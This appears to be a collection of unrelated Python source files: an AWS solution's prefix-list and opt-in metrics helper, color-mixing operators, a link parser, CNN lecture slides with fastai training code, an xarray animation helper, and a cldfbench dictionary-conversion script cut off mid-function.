raise ValueError("STNO CFN Parameter Missing: You must "
"provide at least one valid prefix list id.")
else:
for prefix_list_id in list_of_prefix_list_ids:
arn = "%s%s:%s%s%s" % ("arn:aws:ec2:",
environ.get('AWS_REGION'),
account_id,
":prefix-list/",
prefix_list_id)
list_of_prefix_list_arns.append(arn)
response = {"PrefixListArns": list_of_prefix_list_arns}
return response
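# The ARNs built above follow the format (hypothetical region and IDs):
# "arn:aws:ec2:us-east-1:111122223333:prefix-list/pl-0123456789abcdef0"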
# Send anonymous metrics
class CFNMetrics(object):
def __init__(self, event, logger):
self.event = event
self.params = event.get('ResourceProperties')
self.logger = logger
self.logger.info(event)
def put_ssm_parameter(self, key, value):
try:
ssm = SSM(self.logger)
response = ssm.describe_parameters(key)
self.logger.info(response)
# put parameter if key does not exist
if not response:
ssm.put_parameter(key, value)
except Exception as e:
self.logger.info(e)
pass
# put metrics_flag and uuid in the parameter store
def put_ssm(self):
try:
# create SSM parameters to send anonymous data if opted in
flag_value = self.params.get('MetricsFlag')
self.put_ssm_parameter('/solutions/stno/metrics_flag', flag_value)
self.put_ssm_parameter('/solutions/stno/customer_uuid', str(uuid4()))
except Exception as e:
self.logger.info(e)
pass
# Upload the configuration file having customer configurations to customer's s3 bucket
def send_metrics(self):
try:
self.put_ssm()
self.logger.info(self.params)
data = {
"PrincipalType": self.params.get('PrincipalType'),
"ApprovalNotificationFlag": self.params.get('ApprovalNotification'),
"AuditTrailRetentionPeriod": self.params.get('AuditTrailRetentionPeriod'),
"DefaultRoute": self.params.get('DefaultRoute'),
"Region": get_region(),
"SolutionVersion": self.params.get('SolutionVersion'),
"CreatedNewTransitGateway": self.params.get(
'CreatedNewTransitGateway')
}
send = Metrics(self.logger)
send.metrics(data)
except Exception as e:
self.logger.info(e)
pass
|
python
|
"""
Operators with arity 2.
Take 2 colors and mix them in some way. Owns two 0/1 arity operators,
which calculate the initial colors.
Adds a shift by colors, that is, for two colors [rgb] + [RGB] can mix as
([rR gG bB], [rG gB bR], [rB gR bG]).
"""
from abc import ABC, abstractmethod
from .base import Operator, operator_subclass_names, COLOR_TYPE
from .arity_1_operators import ZERO_ONE_OPERATOR
class TwoArityOperator(Operator, ABC):
"""
This is a two-level operator.
Modifies and mix the original values using the formula from the
`formula` method.
Has two colors that were originally generated.
"""
arity = 2
suboperators: tuple[ZERO_ONE_OPERATOR]
def __self_init__(self):
self.shift = self.random.randint(0, 2)
def __str_extra_args__(self) -> list[str]:
return [f"shift={self.shift}"]
@abstractmethod
def formula(self, col_1: float, col_2: float) -> float:
"""
The formula by which the two channels of colors are mixed.
"""
pass
def func(self, first_col: COLOR_TYPE, second_col: COLOR_TYPE) -> COLOR_TYPE:
"""
Color generation function. Accepts data for generation and
outputs the first color step according to the described formula.
"""
return (
self.formula(first_col[0], second_col[(0 + self.shift) % 3]),
self.formula(first_col[1], second_col[(1 + self.shift) % 3]),
self.formula(first_col[2], second_col[(2 + self.shift) % 3]),
)
# ======================================================================
class Sum(TwoArityOperator):
"""
Calculates the average between the two colors.
Slightly decreases the brightness of the color because it averages
the two values.
"""
def formula(self, col_1, col_2):
return (col_1 + col_2) / 2
class Product(TwoArityOperator):
"""
Multiplies one color by another.
"""
def formula(self, col_1, col_2):
return col_1 * col_2
class Mod(TwoArityOperator):
"""
Calculates the mod of one color relative to another.
It decreases the brightness of the color, making it more like gray
(0.0), since the result of taking one value modulo the other is smaller
in magnitude than the second value.
"""
def formula(self, col_1, col_2):
if col_2 == 0:
return 0
return col_1 % col_2
class Exponentiation(TwoArityOperator):
"""
It changes the color by raising the absolute value of one color to the
power of the other. The sign of the result is taken from the second color.
It increases the brightness of the color, almost always giving
brightness (< -0.5) | (> 0.5).
"""
def formula(self, col_1, col_2):
col_1 = abs(col_1)
if col_2 < 0:
return - col_1 ** abs(col_2)
else:
return col_1 ** col_2
ZERO_ONE_TWO_OPERATOR = ZERO_ONE_OPERATOR | TwoArityOperator
__all__ = operator_subclass_names(locals())
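# A minimal standalone sketch (not part of the module API, independent of the
# Operator machinery above) showing how `shift` rotates the channels of the second
# color before mixing, here using the Sum formula:
def _demo_mix(first_col, second_col, shift):
    # Pair channel i of the first color with channel (i + shift) % 3 of the second.
    return tuple(
        (first_col[i] + second_col[(i + shift) % 3]) / 2
        for i in range(3)
    )
# _demo_mix((1.0, 0.0, 0.0), (0.0, 1.0, 0.0), shift=1) pairs (r, G), (g, B), (b, R)
# and yields (1.0, 0.0, 0.0).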
|
python
|
from urllib.parse import urlparse
def parse_link(link):
href = link.attrs.get("href")
return href and urlparse(href)
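# Hypothetical usage with BeautifulSoup (assumes `link` is a bs4 Tag, which exposes
# its attributes via `.attrs`):
#   soup = BeautifulSoup('<a href="https://example.com/p?q=1">x</a>', "html.parser")
#   parse_link(soup.a).netloc  # -> "example.com"
# A tag without an href yields None instead of a ParseResult.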
|
python
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.13.7
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %% [markdown] slideshow={"slide_type": "slide"}
# <img src="img/python-logo-notext.svg"
# style="display:block;margin:auto;width:10%"/>
# <h1 style="text-align:center;">Convolutional Neural Nets</h1>
# <h2 style="text-align:center;">Dr. Matthias Hölzl</h2>
# %% [markdown] slideshow={"slide_type": "subslide"}
# # Representation of Images
#
# <img src="img/ag/Figure-21-001.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# # Filter for Yellow Pixels
# <img src="img/ag/Figure-21-002.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## How the Yellow Filter Works
# <img src="img/ag/Figure-21-003.png" style="width: 40%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## "Ausstanzen" der Werte
# <img src="img/ag/Figure-21-004.png" style="width: 40%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## Sliding the Filter
# <img src="img/ag/Figure-21-005.png" style="width: 50%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## Example
# <img src="img/ag/Figure-21-006.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# ## Parallel Processing
# <img src="img/ag/Figure-21-007.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# ## Convolution
#
# <img src="img/ag/Figure-21-008.png" style="width: 40%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## Convolution: Anchor
#
# <img src="img/ag/Figure-21-009.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## Convolution: How It Works
# <img src="img/ag/Figure-21-010.png" style="width: 50%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## Input and Weights Have the Same Size
# <img src="img/ag/Figure-21-011.png" style="width: 50%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# ## Sliding the Filter
# <img src="img/ag/Figure-21-013.png" style="width: 40%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# ## Example
#
# <img src="img/ag/Figure-21-014.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
#
# <br/>
# <div style="display: block; width: 30%; float: left">
# <ul>
# <li>Red fields: -1</li>
# <li>Yellow fields: 1</li>
# <li>Black fields: 0</li>
# <li>White fields: 1</li>
# </ul>
# </div>
#
# <div style="display: block; width: 50%; float: left;">
# <ul>
# <li>Minimum value: -6</li>
# <li>Maximum value: 3</li>
# </ul>
# </div>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-015.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-016.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# ## Another Perspective: Cutting Images into Pieces
# <img src="img/ag/Figure-21-017.png" style="width: 30%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# ## Hierarchical Features
# <img src="img/ag/Figure-21-018.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-019.png" style="width: 40%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-020.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-021.png" style="width: 50%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-022.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-023.png" style="width: 40%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# # Boundary Values
# <img src="img/ag/Figure-21-024.png" style="width: 30%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-025.png" style="width: 35%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## Shrinking of the Result
#
# <img src="img/ag/Figure-21-026.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## Padding
# <img src="img/ag/Figure-21-027.png" style="width: 35%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# # ConvNet for MNIST
# <img src="img/ag/Figure-21-048.png" style="width: 60%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# ## Performance
# <img src="img/ag/Figure-21-049.png" style="width: 50%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# <img src="img/ag/Figure-21-050.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% slideshow={"slide_type": "slide"}
from fastai.vision.all import *
import torch
from torch import nn
import torch.nn.functional as F
from torch.utils.data import DataLoader
from torchvision import datasets, transforms
# %%
model = nn.Sequential(
nn.Conv2d(1, 32, 3, 1),
nn.ReLU(),
nn.Conv2d(32, 64, 3, 1),
nn.MaxPool2d(2),
nn.Dropout2d(0.25),
nn.Flatten(1),
nn.Linear(9216, 128),
nn.ReLU(),
nn.Dropout2d(0.5),
nn.Linear(128, 10),
nn.LogSoftmax(dim=1)
)
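# Sanity check for Linear(9216, 128) above (informal, assuming 28x28 MNIST input):
# 28 -> 26 after the first 3x3 conv, -> 24 after the second, -> 12 after
# MaxPool2d(2); 64 channels * 12 * 12 = 9216 flattened features.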
# %%
transform = transforms.Compose([transforms.ToTensor()])
batch_size = 256
test_batch_size = 512
epochs = 5
learning_rate = 0.001
# %%
train_loader = DataLoader(
datasets.MNIST('../data', train=True, download=True, transform=transform),
batch_size=batch_size, shuffle=True)
test_loader = DataLoader(
datasets.MNIST('../data', train=False, transform=transform),
batch_size=test_batch_size, shuffle=True)
# %%
data = DataLoaders(train_loader, test_loader)
# %%
learn = Learner(data, model, loss_func=F.nll_loss, opt_func=Adam, metrics=accuracy)
# %%
learn.lr_find()
# %%
learn.fit_one_cycle(epochs, learning_rate)
# %% [markdown] slideshow={"slide_type": "slide"}
# # Stride 1
# <img src="img/ag/Figure-21-028.png" style="width: 40%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## Stride 3 $\times$ 2
# <img src="img/ag/Figure-21-029.png" style="width: 20%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## Stride 3 $\times$ 2
# <img src="img/ag/Figure-21-030.png" style="width: 50%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## Uniform Strides: 2, 3
# <img src="img/ag/Figure-21-031.png" style="width: 50%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## Stride = Filter Size
# <img src="img/ag/Figure-21-032.png" style="width: 50%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## Color Images: Multiple Layers
# <img src="img/ag/Figure-21-033.png" style="width: 40%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-034.png" style="width: 40%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-035.png" style="width: 40%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# ## Stacks of Convolutions
# <img src="img/ag/Figure-21-036.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-037.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-038.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# # 1D Convolution
# <img src="img/ag/Figure-21-039.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# # 1$\times$1 Convolution
# <img src="img/ag/Figure-21-040.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# # 1$\times$1 Convolution: Dimensionality Reduction
# <img src="img/ag/Figure-21-041.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# # Padding and Upsampling (Fractional Convolution)
#
# <img src="img/ag/Figure-21-042.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# ## No Padding
# <img src="img/ag/Figure-21-043.png" style="width: 40%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## 1 Pixel Padding
# <img src="img/ag/Figure-21-044.png" style="width: 30%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## 2 Pixel Padding
# <img src="img/ag/Figure-21-045.png" style="width: 35%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## Upsampling via Convolution
# <img src="img/ag/Figure-21-046.png" style="width: 35%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-047.png" style="width: 35%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# # VGG 16
# <img src="img/ag/Figure-21-051.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# <img src="img/ag/Figure-21-052.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# <img src="img/ag/Figure-21-053.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-054.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-055.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-056.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# ## Example Classification
# <img src="img/ag/Figure-21-057.png" style="width: 40%; margin-left: auto; margin-right: auto;"/>
# %% [markdown]
# # Classifying Images with VGG16
# %%
path = untar_data(URLs.DOGS)
# %%
path.ls()
# %%
files = get_image_files(path/'images')
len(files)
# %%
files[0]
# %%
def label_func(f):
return f[0].isupper()
# %%
dls = ImageDataLoaders.from_name_func(path, files, label_func, item_tfms=Resize(224))
# %%
dls.show_batch()
# %%
learn = cnn_learner(dls, vgg16_bn, metrics=error_rate)
learn.fine_tune(1)
# %%
learn.predict(files[0]), files[0]
# %%
learn.show_results()
# %% [markdown] slideshow={"slide_type": "slide"}
# ## Visualization of VGG16 (Gradient Ascent)
# <img src="img/ag/Figure-21-058.png" style="width: 35%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# <img src="img/ag/Figure-21-059.png" style="width: 35%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# <img src="img/ag/Figure-21-060.png" style="width: 35%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# <img src="img/ag/Figure-21-061.png" style="width: 35%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# <img src="img/ag/Figure-21-062.png" style="width: 35%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# # Visualization (Effect of Individual Layers)
# <img src="img/ag/Figure-21-063.png" style="width: 35%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-064.png" style="width: 35%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-065.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-066.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-067.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# <img src="img/ag/Figure-21-068.png" style="width: 70%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "slide"}
# # Adversarial Examples
# <img src="img/ag/Figure-21-069.png" style="width: 50%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-070.png" style="width: 50%; margin-left: auto; margin-right: auto;"/>
# %% [markdown] slideshow={"slide_type": "subslide"}
# <img src="img/ag/Figure-21-071.png" style="width: 50%; margin-left: auto; margin-right: auto;"/>
# %%
|
python
|
import matplotlib.pyplot as plt
import matplotlib.animation as animation
def ani_easy(tas, cmap='BrBG'):
# Get a handle on the figure and the axes
fig, ax = plt.subplots(figsize=(12,6))
# Plot the initial frame.
cax = tas[0,:,:].plot(
add_colorbar=True,
cmap=cmap,
#cmap='BrBG',
#cmap='magma',
# vmin=-40, vmax=40,
cbar_kwargs={
'extend':'neither'
}
)
num_frames = tas.shape[0]
# Next we need to create a function that updates the values for the colormesh, as well as the title.
def animate(frame):
cax.set_array(tas[frame,:,:].values.flatten())
ax.set_title("Time = " + str(tas.coords['time'].values[frame])[:13])
# Finally, we use the animation module to create the animation.
ani = animation.FuncAnimation(
fig, # figure
animate, # name of the function above
frames=num_frames, # Could also be iterable or list
interval=200 # ms between frames
)
return ani
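# Hypothetical usage sketch (assumes `tas` is an xarray.DataArray with dimensions
# (time, lat, lon); the file and variable names are made up):
#   import xarray as xr
#   tas = xr.open_dataset("tas_monthly.nc")["tas"]
#   ani = ani_easy(tas, cmap="magma")
#   ani.save("tas.mp4", fps=10)   # or embed in a notebook via ani.to_jshtml()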
|
python
|
from collections import ChainMap, defaultdict
from itertools import chain
import pathlib
import re
from cldfbench import Dataset as BaseDataset, CLDFSpec
from pybtex.database import parse_string
from pydictionaria.sfm_lib import Database as SFM
from pydictionaria.preprocess_lib import marker_fallback_sense, merge_markers
from pydictionaria import sfm2cldf
CROSSREF_BLACKLIST = {'xv', 'lg'}
CROSSREF_MARKERS = {'cf', 'mn', 'sy', 'an', 'cont', 'lv'}
def _unhtml(pair):
marker, value = pair
if marker == 'mr':
return marker, re.sub(r'<compo>([^<]+)</compo>', r'|fv{\1}', value)
else:
return pair
def unhtml_mr(entry):
if entry.get('mr'):
return entry.__class__(map(_unhtml, entry))
else:
return entry
def prepreprocess(entry):
entry = unhtml_mr(entry)
return entry
class MySFM(SFM):
def __init__(self, entries):
self.extend(entries)
class EntrySplitter:
def __init__(self):
self._homonyms = defaultdict(int)
self.id_map = {}
self.la_index = {}
def _split_groups(self, entry):
groups = [entry.__class__()]
for marker, value in entry:
if marker == 'gp':
groups.append(entry.__class__())
groups[-1].append((marker, value))
return groups[0], groups[1:]
def _split_senses(self, entry):
if not entry:
return []
senses = [entry.__class__()]
for marker, value in entry:
if marker == 'sn':
senses.append(entry.__class__())
senses[-1].append((marker, value))
return senses
def _extract_subentries(self, entry):
main_entry = entry.__class__()
subentries = []
senses = self._split_senses(entry)
for sense in senses:
sense_subentries = []
for marker, value in sense:
if marker == 'se':
sense_subentries.append(entry.__class__())
if sense_subentries:
sense_subentries[-1].append((marker, value))
else:
main_entry.append((marker, value))
subentries.extend(sense_subentries)
return main_entry, subentries
def _generate_subentry(self, subentry, parent_id, ps):
lx = subentry.get('se')
hm = subentry.get('hm') or ''
old_id = '{}_{}'.format(lx, hm) if hm else lx
self._homonyms[lx] += 1
new_hm = str(self._homonyms[lx])
new_id = '{}{}'.format(lx, new_hm)
self.id_map[old_id] = new_id
new_entry = subentry.__class__()
new_entry.append(('lx', lx))
new_entry.append(('hm', new_hm))
new_entry.append(('cont', parent_id))
# Some subentries override the part of speech of the entry
if ps and not subentry.get('ps'):
new_entry.append(('ps', ps))
new_entry.extend((m, v) for m, v in subentry if m not in ('se', 'hm'))
return new_entry
def split_entry(self, entry):
lx = entry.get('lx')
la = entry.get('la')
hm = entry.get('hm') or ''
citation_form = la or lx
old_id = '{}_{}'.format(citation_form, hm) if hm else citation_form
ps = entry.get('ps')
main_entry, groups = self._split_groups(entry)
if groups:
new_entries = []
subentries = []
for group in groups:
group_entries = self._split_groups(group)
gp = group.get('gp') or ''
old_gid = '{}.{}'.format(old_id, gp) if gp else old_id
self._homonyms[lx] += 1
new_hm = str(self._homonyms[lx])
new_id = '{}{}'.format(lx, new_hm)
self.id_map[old_gid] = new_id
if la:
if la not in self.la_index:
self.la_index[la] = new_id
la_gid = '{}.{}'.format(la, gp) if gp else la
if la_gid not in self.la_index:
self.la_index[la_gid] = new_id
group_entry, group_subentries = self._extract_subentries(group)
group_ps = group_entry.get('ps')
new_entry = entry.__class__(
(m, v) for m, v in main_entry if m not in ('hm', 'ps'))
new_entry.append(('hm', new_hm))
# Some groups override the part of speech of the entry
if ps and not group_ps:
new_entry.append(('ps', ps))
new_entry.extend(
(m, v) for m, v in group_entry if m != 'gp')
new_entries.append(new_entry)
subentries.extend(
self._generate_subentry(subentry, old_gid, group_ps or ps)
for subentry in group_subentries)
if len(new_entries) > 1:
for entry in new_entries:
heterosemes = [
'{}{}'.format(e.get('lx'), e.get('hm'))
for e in new_entries
if e is not entry]
entry.append(('heterosemes', ' ; '.join(heterosemes)))
for e in new_entries:
yield e
for e in subentries:
yield e
else:
main_entry, subentries = self._extract_subentries(main_entry)
self._homonyms[lx] += 1
new_hm = str(self._homonyms[lx])
new_id = '{}{}'.format(lx, new_hm)
self.id_map[old_id] = new_id
if la and la not in self.la_index:
self.la_index[la] = new_id
new_entry = entry.__class__(
(m, v) for m, v in main_entry if m != 'hm')
new_entry.insert(1, ('hm', new_hm))
yield new_entry
for subentry in subentries:
yield self._generate_subentry(subentry, old_id, ps)
def _fix_single_ref(ref, id_map):
# Shave off sense numbers
ref = re.sub(r'–\d+$', '', ref.strip())
return (
id_map.get(ref)
or id_map.get('{}_1'.format(ref))
or id_map.get('{}.A'.format(ref))
or id_map.get('{}_1.A'.format(ref))
or ref)
def _fix_crossref_field(value, id_map):
return ';'.join(_fix_single_ref(v, id_map) for v in value.split(';'))
def fix_crossrefs(entry, id_map):
def fix_inline_crossref(match):
new_link = _fix_crossref_field(
'{}{}'.format(match.group(2), match.group(3) or ''),
id_map)
return '|{}{{{}}}'.format(match.group(1), new_link)
new_entry = entry.__class__()
for marker, value in entry:
if marker in CROSSREF_MARKERS:
value = _fix_crossref_field(value, id_map)
elif marker not in CROSSREF_BLACKLIST:
value = re.sub(
r'\|(fv|vl)\{([^}]+)\}(?:\|hm\{(\d+)\})?',
fix_inline_crossref,
value)
new_entry.append((marker, value))
return new_entry
def reorganize(sfm):
"""Use this function if you need to manually add or remove entrys from the
SFM data.
Takes an SFM database as an argument and returns a modified SFM database.
"""
splitter = EntrySplitter()
sfm = MySFM(
new_entry
for old_entry in sfm
for new_entry in splitter.split_entry(old_entry))
sfm.visit(lambda e: fix_crossrefs(e, ChainMap(splitter.id_map, splitter.la_index)))
return sfm
def _convert_before_sn(mapping, entry):
found_sn = False
for m, v in entry:
if found_sn:
yield m, v
elif m == 'sn':
found_sn = True
yield m, v
else:
yield mapping.get(m, m), v
def convert_before_sn(mapping, entry):
if entry.get('sn'):
return entry.__class__(_convert_before_sn(mapping, entry))
else:
return entry
def remove_markers(markers, entry):
return entry.__class__(
(m, v)
for m, v in entry
if m not in markers)
def move_images_into_sense(entry):
"""Sometimes there are \pc tags in the entry -- move those to the first sense."""
if not entry.get('sn') or not entry.get('pc'):
return entry
new_entry = entry.__class__()
found_sn = None
images = []
for m, v in entry:
if found_sn:
new_entry.append((m, v))
elif m == 'pc':
images.append([v])
elif m == 'lg':
images[-1].append(v)
elif m == 'sn':
# jump out early if the entry did not contain any pictures
if not images:
return entry
found_sn = True
new_entry.append((m, v))
for image in images:
new_entry.append(('pc', image[0]))
for lg in image[1:]:
new_entry.append(('lg', lg))
else:
new_entry.append((m, v))
return new_entry
def _box_markers(box):
if 'conf' in box:
conf = '{}: {}'.format(box['tie'], box['conf']) if 'tie' in box else box['conf']
yield 'conf', conf
if 'cona' in box:
cona = '{}: {}'.format(box['tin'], box['cona']) if 'tin' in box else box['cona']
yield 'cona', cona
if 'conv' in box:
conv = '{}: {}'.format(box['tiv'], box['conv']) if 'tiv' in box else box['conv']
yield 'conv', conv
def merge_infobox_titles(entry):
box_markers = {'enc', 'tie', 'tin', 'tiv', 'conv', 'conf', 'cona'}
box = {}
new_entry = entry.__class__()
for marker, value in entry:
if marker == 'enc':
box['enc'] = value
elif box:
if marker in box_markers:
box[marker] = value
else:
new_entry.extend(_box_markers(box))
box = {}
new_entry.append((marker, value))
else:
new_entry.append((marker, value))
if box:
new_entry.extend(_box_markers(box))
return new_entry
def merge_etymology(marker_dict):
return '{el}{sep1}{et}{sep2}{eg}'.format(
el=marker_dict.get('el') or '',
sep1=': ' if marker_dict.get('el') and len(marker_dict) > 1 else '',
et=marker_dict.get('et'),
sep2=' ' if marker_dict.get('el') and marker_dict.get('eg') else '',
eg="'{}'".format(marker_dict.get('eg')) if marker_dict.get('eg') else '')
def generate_link_label(entry):
link_label = entry.get('la') or entry.get('lx') or ''
new_entry = entry.__class__(entry)
new_entry.insert(1, ('link_label', link_label))
return new_entry
def preprocess(entry):
"""Use this function if you need to change the contents of an entry before
any other processing.
This is run on every entry in the SFM database.
"""
entry = remove_markers(('dnu',), entry)
entry = move_images_into_sense(entry)
entry = marker_fallback_sense(entry, 'de', 'gn')
entry = marker_fallback_sense(entry, 'gxx', 'ge')
entry = marker_fallback_sense(entry, 'gxy', 'gr')
entry = merge_infobox_titles(entry)
entry = merge_markers(entry, ['ue', 'ee'], 'ee')
entry = merge_markers(entry, ['un', 'en'], 'en')
entry = merge_markers(entry, ['pdl', 'pdv'], 'pdv')
entry = merge_markers(entry, ['el', 'et', 'eg'], 'et', format_fn=merge_etymology)
entry = generate_link_label(entry)
return entry
def _remove_inline_markers(val):
if isinstance(val, str):
return re.sub(r'\|\w+\{([^}]+)\}', r'\1', val)
else:
return val
def _warn_about_table(table_name, table, columns, link_regex, cldf_log):
if not columns:
return
for row in table:
row_id = row.get('ID')
for colname, value in row.items():
if colname not in columns:
continue
for link_match in re.finditer(link_regex, value):
link = link_match.group(0)
if re.fullmatch(r'\s*\[.*\]\s*\(.*\)\s*', link):
continue
msg = '{}:{}:{}:unknown in-line cross reference `{}`'.format(
table_name, row_id, colname, link)
cldf_log.warn(msg)
def warn_about_inline_references(
entries, senses, examples, props, cldf_log
):
props = sfm2cldf._add_property_fallbacks(props)
if not props.get('link_regex') or not props.get('process_links_in_markers'):
return
_warn_about_table(
'EntryTable',
entries,
{
props['entry_map'][m]
for m in props['process_links_in_markers']
if m in props['entry_map']
},
props['link_regex'],
cldf_log)
_warn_about_table(
'SenseTable',
senses,
{
props['sense_map'][m]
for m in props['process_links_in_markers']
if m in props['sense_map']
},
props['link_regex'],
cldf_log)
_warn_about_table(
'ExampleTable',
examples,
{
props['example_map'][m]
for m in props['process_links_in_markers']
if m in props['example_map']
},
props['link_regex'],
cldf_log)
def remove_inline_markers(val):
if isinstance(val, list):
return [_remove_inline_markers(v) for v in val]
else:
return _remove_inline_markers(val)
def clean_table(table):
return [
{k: remove_inline_markers(v) for k, v in row.items()}
for row in table]
def authors_string(authors):
"""Return formatted string of all authors."""
def is_primary(a):
return not isinstance(a, dict) or a.get('primary', True)
primary = ' and '.join(
a['name'] if isinstance(a, dict) else a
for a in authors
if is_primary(a))
secondary = ' and '.join(
a['name']
for a in authors
if not is_primary(a))
if primary and secondary:
